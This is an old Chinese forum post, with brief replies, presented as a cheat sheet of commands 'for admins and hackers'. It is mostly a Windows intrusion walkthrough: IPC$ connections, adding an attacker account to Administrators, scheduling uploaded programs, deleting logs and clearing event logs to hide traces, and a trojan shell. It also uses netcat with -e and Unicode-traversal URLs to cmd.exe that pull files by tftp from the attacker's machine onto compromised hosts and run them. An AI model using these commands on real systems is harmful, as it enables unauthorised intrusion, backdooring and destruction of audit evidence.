社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3091阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 CP9Q|'oJ  
常用的几条NET命令: 1@I#Fv  
vWmt<E|e  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" ^"<Bk<b(  
DC).p'0VL  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" 2<UC^vZ  
mQVlE__ub  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ ,1 H|{<  
1ik.|T<f0  
(查看远程主机时间) net time \\IP地址 &I ~'2mpk  
{=?[:5  
(定时启动某个程序) at \\IP地址 02:18 readme.exe 38&K"  
#7H0I8  
(查看共享) net view \\IP地址 }0<2n~3P  
=C$"e4%Be  
(查看netbios工作组列表) nbtstat -A IP地址 pvsY 0a@4  
L %acsb}  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" XPrnQJ  
`&x>2FJ  
(这两条把自己增加到管理员组): net user 用户名 密码 /add L:_{bE|TY  
yqx!{8=V  
net localgroup Administrators 用户名 /add en|~`]HF  
O D5qPovsd  
(断开连接) net use \\IP地址\ipc$ /delete zK~_e\m  
!lg_zAV  
扫尾: e%:vLE 9  
|^Yz*r?BJ  
del C:\winnt\system32\logfiles\*.* D@X"1X!F`G  
;C=d( pY  
del C:\winnt\ssytem32\config\*.evt Rm n|!C%%K  
y)|d`qC\  
del C:\winnt\system32\dtclog\*.* N:64Gko"K  
>P(.yQ8&kL  
del C:\winnt\system32\*.log /Cwwz  
f8K0/z  
del C:\winnt\system32\*.txt &b:y#gvJ:  
~b *|V  
del C:\winnt\*.txt l-r$czY  
,]JIp~=nsh  
del C:\winnt\*.log J0bcW25  
0u"j^v  
一、netsvc.exe tol-PJS}  
q@S \R 7R  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: \5N \NN @J  
bhDqRM  
netsvc /list \\IP地址 21<Sfsc$  
C+!=C{@7di  
netsvc schedule \\IP地址 /query Y[b08{/  
xv>8rW(Np5  
netsvc \\IP地址 schedule /start 9`qw,X&AK_  
WllQM,h  
二、OpenTelnet.exe p:tp |/  
'Kmf6iK>[  
远程启动主机的Telnet服务,并绑定端口到7878,例如: {pXX%>  
c'?EI EP  
OpenTelnet \\IP地址 用户名 密码 1 7878 "<egm^Yq  
6&i])iH  
然后就可以telnet到主机的7878端口,进入DOS方式下: 3r^||(_u  
' "%hX&]5  
telnet IP地址 7878 =saRh)EM  
 fZap\  
三、winshell.exe =j w?*  
zvnd@y{[  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: /!5cf;kl*l  
m_  wvi  
p Path (查看winshell主程序的路径信息) OP(om$xm  
fi'zk  
b reBoot (重新启动机器) LD WYFOGQ  
sjLm-pn3  
d shutDown (关闭机器) xzx~H>M  
.j)DE}[q>  
s Shell (执行后你就会看到可爱的“C:\>”) Ao\OU}  
2b\ h@VJt  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) ,3G B9  
oKkDG|IE  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) wE9z@\z]  
 R'_F9\  
四、3389登陆器,GUI方式登录远程主机的 m/g[9Y  
mm!JNb9(  
五、elsave.exe NU.4_cixb  
,{ 0&NX  
事件日志清除工具 o@$py U8  
I+ Qt5Ox  
elsave -s \\IP地址 -l "application" -C aY, '^S  
@GweNo`p7  
elsave -s \\IP地址 -l "system" -C hE\gXb  
(3x2^M8  
elsave -s \\IP地址 -l "security" -C [ x.]  
]~3a~  
执行后成功清除应用程序日志,系统日志,安全日志 ;&w_.j*Is  
n[a%*i6x  
六、hbulot.exe hE,-CIRg  
^8ilUu  
开启win2kserver和winxp的3389服务 E_D@ 7a  
{^:i}4ZRl  
hbulot [/r] ^5!"[RB\  
W^,p2  
使用/r表示安装完成后自动重起目标使设置生效。 Ly`.~t(~l  
MnY}U",   
七、nc.exe(netcat.exe) './qBJ  
$Vs5d= B  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 8v^AVg  
l,QO+ >)z  
想要连接到某处: nc [-options] hostname port[s] [ports] ... 5@bmm]  
;;^?vS  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] -q-BP}r3  
C?g*c  
参数: \@NnL\ t u  
G&N),wsNZK  
-e prog 程序重定向,一旦连接,就执行 [危险!!] zLS?: yq  
1TN+pmc}@  
-g gateway source-routing hop point[s], up to 8 ?ZKIs9E[m  
]K5j(1EN  
-G num source-routing pointer: 4, 8, 12, ... bM W}.v!  
*$t=Lh  
-h 帮助信息 7W/55ZTmJ  
1OK~*=/4  
-i secs 延时的间隔 XS0NjZW  
M}" KAa  
-l 监听模式,用于入站连接 )Y1+F,C  
,I f9w$(z  
-n 指定数字的IP地址,不能用hostname O~Dm|hP  
(iO/@iw  
-o file 记录16进制的传输 n5#9o},oK  
S U P  
-p port 本地端口号 u69G #  
:N4?W}r.  
-r 任意指定本地及远程端口 ,{RWs^W2  
EF6"PH+J@  
-s addr 本地源地址 m FC9\   
<;Td8T;  
-u UDP模式 ,UT :wpc^i  
~05(92bK  
-v 详细输出——用两个-v可得到更详细的内容 8\`otJY  
*U,W4>(B  
-w secs timeout的时间 S }G3ha  
F B&l|#e  
-z 将输入输出关掉——用于扫描时 0)|;uW  
八、TFTPD32.EXE =\jPnov!  
pN;Tt+}  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: 6bpO#&T  
VpM(}QHd  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 7I@@}A  
`v Ebm Xb  
然后可以直接令文件运行: .uo:fxbd2  
C #@5:$  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 kgFx  
/T<,vR  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 PrEfJ?  
sGbk4g  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 _7-P8"m  
H#I%6k*\a  
一、一 Xscan命令行运行参数说明: `hl1R3nBM  
Wl>$<D4mO[  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 Ac Y!  
d a.6Z!a  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] .t%` "C  
^ G>/;mZ  
xscan -file <主机列表文件名> <检测项目> [其他选项] =/^{Pn  
E K^["_*A  
其中<检测项目> 含义如下: u6p nO  
V34]5  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); EDGAaN*Q  
v<S?"# ]F=  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); +JBYGYN&K  
b@N*W]  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); bdyE9t   
HNL;s5gq  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); [JX=<a)U  
mr#XN&e  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); zJtB?<  
~VO?PfxZ  
[其他选项] 含义如下: :eTzjW=  
'ul~f$ V  
-v: 显示详细扫描进度 7`t[|o  
k3B]u.Lo  
-p: 跳过Ping不通的主机 PqwoZo0j  
%-, -:e  
-o: 跳过没有检测到开放端口的主机 = M/($PA  
8`  f=E h  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 _0]{kB.$_  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
10+5=?,请输入中文答案:十五